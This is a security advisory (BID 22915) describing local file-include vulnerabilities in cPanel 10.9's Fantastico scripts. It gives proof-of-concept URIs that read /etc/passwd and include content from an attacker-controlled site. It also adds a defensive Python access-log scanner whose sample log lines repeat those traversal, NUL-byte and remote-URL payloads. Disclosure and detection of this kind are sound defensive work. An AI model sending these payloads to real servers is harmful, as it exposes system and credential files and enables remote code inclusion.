cPanel Multiple Local File Include Vulnerabilities
BID:22915
Info
| Bugtraq ID: | 22915 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 11 2007 12:00AM |
| Updated: | Mar 12 2007 04:54PM |
| Credit: | cyb3rt & 020 are credited with the discovery of these vulnerabilities. |
| Vulnerable: | cPanel cPanel 10.9 build 134; cPanel cPanel 10.9 build 125; cPanel cPanel 10.9 |
| Not Vulnerable: | |
Discussion
cPanel is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues may allow an unauthorized user to view local files on the affected webserver.
These issues affect cPanel 10.9.x and prior versions.
Exploit / POC
Attackers can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://example.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd
http://example.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=attacker site
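As an added defender-side example (not part of the advisory and not cPanel code), the following Python script scans web-server access-log lines for requests to the two scripts named above whose userlanguage or fantasticopath parameter carries an absolute path, directory traversal, a NUL byte or a remote URL scheme. The log lines, timestamps and IP addresses are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); not taken from the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Mar/2007:10:02:11 +0000] "GET /frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd HTTP/1.1" 200 1834
203.0.113.5 - - [11/Mar/2007:10:02:40 +0000] "GET /frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=http://attacker.example/ HTTP/1.1" 200 512
198.51.100.9 - - [11/Mar/2007:10:03:01 +0000] "GET /frontend/x/fantastico/includes/load_language.php?userlanguage=english HTTP/1.1" 200 1834
198.51.100.9 - - [11/Mar/2007:10:04:19 +0000] "GET /frontend/x/index.html HTTP/1.1" 200 9001
203.0.113.5 - - [11/Mar/2007:10:05:00 +0000] "GET /frontend/x/fantastico/includes/load_language.php?userlanguage=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1834
"""

# Scripts and the parameter each one includes from, as named in the advisory (BID 22915).
WATCHED = {
    "/frontend/x/fantastico/includes/load_language.php": "userlanguage",
    "/frontend/x/fantastico/includes/mysqlconfig.php": "fantasticopath",
}

REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def suspicious_value(value: str) -> bool:
    """True when a language/path value could leave the expected local directory:
    absolute path, traversal, NUL truncation, or a remote URL scheme."""
    # parse_qs already percent-decoded once; decode again to catch double-encoded values.
    v = unquote(value)
    return (v.startswith("/") or ".." in v or "\x00" in v
            or re.match(r"(?i)^[a-z][a-z0-9+.-]*://", v) is not None)

def scan_log(text: str) -> list[dict]:
    """Return one record per request that targets a watched script with a suspicious parameter."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        param = WATCHED.get(parts.path)
        if param is None:
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            if suspicious_value(value):
                hits.append({"ip": m["ip"], "path": parts.path, "param": param,
                             "value": unquote(value), "status": m["status"]})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged request is the stronger signal, since it suggests the include succeeded rather than being blocked.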
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].